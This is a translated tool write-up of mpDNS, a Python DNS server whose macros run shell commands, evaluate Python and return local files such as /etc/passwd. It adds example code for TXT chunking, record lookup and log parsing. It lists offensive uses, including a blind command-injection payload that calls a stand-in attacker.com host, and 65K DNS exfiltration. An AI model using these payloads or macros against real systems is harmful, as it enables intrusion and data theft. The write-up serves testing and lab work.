
mpDNS: a multi-purpose DNS server written in Python

source link: https://www.freebuf.com/sectool/196069.html?amp%3Butm_medium=referral

A simple, configurable "clone and run" DNS server with several useful features.

Works with Python 2 and 3

names.db -> contains all custom records (see the example below)

Simple wildcards such as *.example.com

Catches unicode DNS requests

Custom actions, also known as macros:

- {{shellexec::dig google.com +short}} -> executes a shell command and responds with its result

- {{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> evaluates your Python code

- {{file::/etc/passwd}} -> responds with the contents of a local file

- {{resolve}} -> forwards the DNS request to the local system resolver

- {{resolve::example.com}} -> resolves example.com instead of the original record

- {{echo}} -> responds with the peer address

- {{shellexec::echo %PEER% %QUERY%}} -> use of variables

Supported query types: A, CNAME, TXT

Update names.db records without a restart/reload: ./mpdns.py -e

Heavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py

Usage: ./mpdns.py

Edit names.db with ./mpdns.py -e; no restart required

Offensive and defensive purposes:

1. You need a lightweight, simple DNS server for testing purposes (not for production!)

2. Testing various blind injection vulnerabilities in web applications (e.g. /ping.php?ip=$(dig $(whoami).attacker.com))

3. Easily exfiltrate 65K of data in a single TXT query

4. DNS rebinding

5. Perform custom macro actions on specific queries (useful in a malware analysis lab environment)

6. And more. It is highly customizable.

Installation

git clone https://github.com/nopernik/mpDNS

Limitations

1. Because a UDP datagram is limited to 65535 bytes, DNS responses are limited to roughly 65200 bytes. This limit applies to TXT records, which are split into 256-byte chunks until the response reaches the maximum allowed 65200 bytes, so a TXT macro record such as {{file::localfile.txt}} is limited to 65200 bytes.

2. Nested wildcards such as test.*.example.com are not supported

3. A custom DNS server (resolver) is not supported in the {{resolve::example.com}} macro

4. TTL is always set to 0
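Limitation 1 above is a consequence of how a TXT answer is laid out on the wire: the RDATA is a run of length-prefixed character-strings, and the whole response has to fit in one UDP datagram. The following is an added example, not mpDNS's own code, that packs a payload that way and caps the encoded RDATA at the 65200-byte figure quoted on the page. Two assumptions are worth stating: the chunk size used here is 255 data bytes, which is the RFC 1035 limit for a character-string (the page says 256), and the last chunk is shortened to fill the cap exactly rather than dropped.

```python
"""Added example (not mpDNS's own code) of how a long TXT answer is packed:
the RDATA is a run of <length byte><data> character-strings, and the total
is capped so the UDP datagram stays within the limit quoted in limitation 1.
Chunk size follows RFC 1035 (255 data bytes per string; the page says 256);
the 65200-byte cap is the figure from the page."""
import struct

MAX_CHUNK = 255          # RFC 1035 character-string payload limit
MAX_TXT_RDATA = 65200    # cap taken from the page for one response


def chunk_txt(payload, max_rdata=MAX_TXT_RDATA, chunk=MAX_CHUNK):
    """Split payload into character-strings; the last one is shortened so the
    encoded RDATA (one length byte per string) never exceeds max_rdata."""
    pieces, used = [], 0
    for i in range(0, len(payload), chunk):
        room = max_rdata - used - 1          # data bytes still allowed
        if room <= 0:
            break
        piece = payload[i:i + chunk][:room]
        pieces.append(piece)
        used += 1 + len(piece)
    return pieces


def encode_txt_rdata(payload, **kw):
    """Wire-format RDATA for a TXT record carrying payload (possibly truncated)."""
    return b"".join(struct.pack("B", len(p)) + p for p in chunk_txt(payload, **kw))


def decode_txt_rdata(rdata):
    """Inverse: walk the length-prefixed strings and join their data."""
    out, i = [], 0
    while i < len(rdata):
        n = struct.unpack("B", rdata[i:i + 1])[0]
        i += 1
        if i + n > len(rdata):
            raise ValueError("truncated character-string at offset %d" % i)
        out.append(rdata[i:i + n])
        i += n
    return b"".join(out)


def truncated_bytes(payload, **kw):
    """How many bytes of payload did not fit under the cap."""
    return len(payload) - sum(len(p) for p in chunk_txt(payload, **kw))
```

With a 70000-byte payload the encoder emits 254 full strings plus one shortened string, exactly 65200 bytes of RDATA carrying 64945 bytes of data; the remaining 5055 bytes are silently dropped, which is the behaviour a consumer of such a server has to plan for.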

Examples

Example names.db:

# Empty configuration will result in empty but valid responses
#
# Unicode domain names are not supported but can still be caught by the server.
# For example мама-сервер-unicode.google.com will be caught, but with a SERVFAIL response
passwd.example.com    TXT      {{file::/etc/passwd}}  #comments are ignored
shellexec             TXT      {{shellexec::whoami}}
eval                  TXT      {{eval::import random; res = random.randint(1,500)}}
resolve1              A        {{resolve}}
resolve2              A        {{resolve::self}}      #same as previous
resolve3              A        {{resolve::example.com}}
blabla.com            A        5.5.5.5
*                     A        127.0.0.1
*.example.com         A        7.7.7.7
c1.example.com        CNAME    c2.example.com
c2.example.com        CNAME    c3.example.com
c3.example.com        CNAME    google.example.com
google.example.com    CNAME    google.com
test.example.com      A        8.8.8.8
google.com            A        {{resolve::self}}
notgoogle.com         A        {{resolve::google.com}}

Example output using the example names.db:

Regular resolution from the DB: dig test.example.com @localhost

;; ANSWER SECTION:
test.example.com.    0    IN    A    8.8.8.8

mpDNS output: - Request from 127.0.0.1:57698 -> test.example.com.    -> 8.8.8.8 (A)

Recursive CNAME resolution: dig c1.example.com @localhost

;; QUESTION SECTION:
;c1.example.com.            IN    A
;; ANSWER SECTION:
c1.example.com.        0    IN    CNAME    c2.example.com.
c2.example.com.        0    IN    CNAME    c3.example.com.
c3.example.com.        0    IN    CNAME    google.example.com.
google.example.com.    0    IN    CNAME    google.com.
google.com.        0    IN    A    216.58.206.14

mpDNS output:

- Request from 127.0.0.1:44120      -> c1.example.com.        -> c2.example.com (CNAME)
- Request from 127.0.0.1:44120      -> c2.example.com        -> c3.example.com (CNAME)
- Request from 127.0.0.1:44120      -> c3.example.com        -> google.example.com (CNAME)
- Request from 127.0.0.1:44120      -> google.example.com    -> google.com (CNAME)
- Request from 127.0.0.1:44120      -> google.com            -> {{resolve::self}} (A)

Wildcard resolution: dig not-in-db.com @localhost

;; ANSWER SECTION:
not-in-db.com.        0    IN    A    127.0.0.1

mpDNS output: - Request from 127.0.0.1:38528 -> not-in-db.com.    -> 127.0.0.1 (A)

Wildcard subdomain resolution: dig wildcard.example.com @localhost

;; ANSWER SECTION:
wildcard.example.com.    0    IN    A    7.7.7.7

mpDNS output: - Request from 127.0.0.1:39691 -> wildcard.example.com.    -> 7.7.7.7 (A)
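The names.db example above and the three dig runs that follow it (plain lookup, the c1.example.com CNAME chain, and the two wildcard answers) all come down to one lookup rule set. The block below is an added illustration of those rules, not mpDNS's own code: it parses the names.db layout shown on the page, matches an exact name before a '*.parent' wildcard before the bare '*' catch-all, chases CNAME records on the exact name the way the c1.example.com output shows, and parses '{{name::arg}}' macros with %PEER%/%QUERY% substituted. Two things are assumptions rather than documented behaviour: that CNAMEs on the exact name take priority over a matching wildcard (the only order that reproduces the page's CNAME chain next to the *.example.com record), and that '*.example.com' matches names at any depth below it. Only {{echo}} is evaluated; every other macro is returned as a (name, argument) pair so that nothing is executed or forwarded here.

```python
"""Added illustration (not mpDNS's own code) of the names.db lookup rules:
exact match, '*.zone' wildcard, bare '*' catch-all, CNAME chasing, and
'{{macro}}' parsing with %PEER%/%QUERY% substitution. Matching order and
any-depth wildcards are assumptions, not documented mpDNS behaviour."""
import re

# Constructed sample in the names.db layout shown on the page.
SAMPLE_DB = """
# comments are ignored
*                   A       127.0.0.1
*.example.com       A       7.7.7.7
c1.example.com      CNAME   c2.example.com
c2.example.com      CNAME   c3.example.com
c3.example.com      CNAME   google.example.com
google.example.com  CNAME   google.com
test.example.com    A       8.8.8.8
google.com          A       {{resolve::self}}
echo                TXT     {{echo}}
peer                TXT     {{shellexec::echo %PEER% %QUERY%}}   # variables
"""

MACRO_RE = re.compile(r"^\{\{(\w+)(?:::(.*))?\}\}$", re.S)


def norm(name):
    return name.strip().lower().rstrip(".")


def parse_db(text):
    """Return (name, qtype, value) triples; anything after '#' is a comment."""
    records = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 2)          # value may contain spaces
        if len(parts) != 3:
            raise ValueError("malformed record: %r" % raw)
        name, qtype, value = parts
        records.append((norm(name), qtype.upper(), value.strip()))
    return records


def find_exact(records, qname, qtype):
    return next((v for n, t, v in records if n == qname and t == qtype), None)


def find_record(records, qname, qtype):
    """Exact name, then the nearest '*.parent' wildcard, then bare '*' (nested
    wildcards such as test.*.example.com are not handled, see limitation 2)."""
    value = find_exact(records, qname, qtype)
    if value is not None:
        return value
    labels = qname.split(".")
    for i in range(1, len(labels)):
        value = find_exact(records, "*." + ".".join(labels[i:]), qtype)
        if value is not None:
            return value
    return find_exact(records, "*", qtype)


def parse_macro(value, peer, query):
    """'{{name::arg}}' -> (name, arg) with variables substituted; None for a literal.
    {{resolve}} and {{resolve::self}} both mean 'forward the query name itself'."""
    m = MACRO_RE.match(value)
    if not m:
        return None
    name, arg = m.group(1), m.group(2)
    if arg is not None:
        arg = arg.replace("%PEER%", peer).replace("%QUERY%", query)
    if name == "resolve" and arg in (None, "self"):
        arg = query
    return name, arg


def render(value, peer, query):
    """Literals pass through, {{echo}} becomes the peer address, any other macro
    comes back as a (name, arg) pair: this example deliberately executes nothing."""
    macro = parse_macro(value, peer, query)
    if macro is None:
        return value
    if macro[0] == "echo":
        return peer
    return macro


def resolve(records, qname, qtype, peer, max_depth=16):
    """Answer section as (name, type, value) tuples; CNAMEs on the exact name are
    followed before wildcards are tried, which reproduces the c1.example.com chain."""
    answers = []
    name = norm(qname)
    for _ in range(max_depth):
        value = find_exact(records, name, qtype)
        if value is None and qtype != "CNAME":
            cname = find_exact(records, name, "CNAME")
            if cname is not None:
                answers.append((name, "CNAME", cname))
                name = norm(cname)
                continue
        if value is None:
            value = find_record(records, name, qtype)
        if value is None:
            return answers                   # empty but valid response
        answers.append((name, qtype, render(value, peer, name)))
        return answers
    raise RuntimeError("CNAME chain too long or looped for %s" % qname)


RECORDS = parse_db(SAMPLE_DB)
```

Calling resolve(RECORDS, "c1.example.com", "A", "127.0.0.1") yields the four CNAME tuples followed by ("google.com", "A", ("resolve", "google.com")), mirroring the five log lines mpDNS prints for that query; the bounded max_depth is what keeps a looping CNAME pair in names.db from hanging the lookup.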

Forwarded request macro: dig google.com @localhost

;; ANSWER SECTION:
google.com.        0    IN    A    172.217.22.110

mpDNS output: - Request from 127.0.0.1:53487 -> google.com.    -> {{resolve::self}} (A)

Forwarded request with a custom domain macro: dig notgoogle.com @localhost

;; ANSWER SECTION:
notgoogle.com.        0    IN    A    172.217.22.110

mpDNS output: - Request from 127.0.0.1:47797 -> notgoogle.com.    -> {{resolve::google.com}} (A)

File content macro via a TXT query: dig txt passwd.example.com @localhost

;; ANSWER SECTION:
passwd.example.com.    0    IN    TXT    "root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:......stripped"

mpDNS output: - Request from 127.0.0.1:38805 -> passwd.example.com.    -> ['root:x:0:0:root...(2808)'] (TXT)

Custom Python code macro via a TXT query: dig txt eval @localhost

;; ANSWER SECTION:
eval.            0    IN    TXT    "320"

mpDNS output: - Request from 127.0.0.1:33821 -> eval.    -> ['320'] (TXT)

Shell command macro via a TXT query: dig txt shellexec @localhost

;; ANSWER SECTION:
shellexec.        0    IN    TXT    "root"

mpDNS output: - Request from 127.0.0.1:50262 -> shellexec.    -> ['root'] (TXT)
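Every run above ends with a "- Request from ..." line, and on a lab server of this kind that log is the only record of who queried what and which answers came from a forwarding macro. The block below is an added example, not part of mpDNS, that parses lines in exactly the format shown on this page into structured records and summarises them per peer and per query type. The sample log is constructed from the page's own output lines plus one line from a made-up second peer so that the per-peer counting has something to separate.

```python
"""Added example (not mpDNS's own code): parse the '- Request from ...' lines
mpDNS prints, in the format shown on this page, so the operator of such a lab
server can audit which peers asked for which names and which answers were
forwarded upstream by a {{resolve}} macro."""
import re
from collections import Counter

LOG_RE = re.compile(
    r"^- Request from (?P<ip>\S+?):(?P<port>\d+)\s+->\s+(?P<qname>\S+)"
    r"\s+->\s+(?P<answer>.*?)\s+\((?P<qtype>\w+)\)\s*$")

# Constructed sample: lines copied from the outputs shown on the page plus
# one line from a second, made-up peer.
SAMPLE_LOG = """\
- Request from 127.0.0.1:57698 -> test.example.com.    -> 8.8.8.8 (A)
- Request from 127.0.0.1:44120      -> c1.example.com.        -> c2.example.com (CNAME)
- Request from 127.0.0.1:44120      -> google.com            -> {{resolve::self}} (A)
- Request from 127.0.0.1:38805 -> passwd.example.com.    -> ['root:x:0:0:root...(2808)'] (TXT)
- Request from 127.0.0.1:50262 -> shellexec.    -> ['root'] (TXT)
- Request from 10.0.0.7:5353 -> not-in-db.com.    -> 127.0.0.1 (A)
"""


def parse_line(line):
    """One log line -> dict(ip, port, qname, answer, qtype); None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["qname"] = rec["qname"].rstrip(".").lower()
    return rec


def summarize(text):
    """Counts per peer and per query type, plus the names answered by a {{resolve}} macro."""
    by_peer, by_type, forwarded = Counter(), Counter(), []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        by_peer[rec["ip"]] += 1
        by_type[rec["qtype"]] += 1
        if rec["answer"].startswith("{{resolve"):
            forwarded.append(rec["qname"])
    return {"by_peer": by_peer, "by_type": by_type, "forwarded": forwarded}
```

The answer field is matched lazily so that a TXT answer containing parentheses, like the stripped /etc/passwd line, is not cut short; anything that is not a request line is skipped rather than raising, which keeps the summary usable on a log interleaved with other output.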

*Source: GitHub. Compiled by 周大涛; please credit FreeBuf.COM when reprinting.

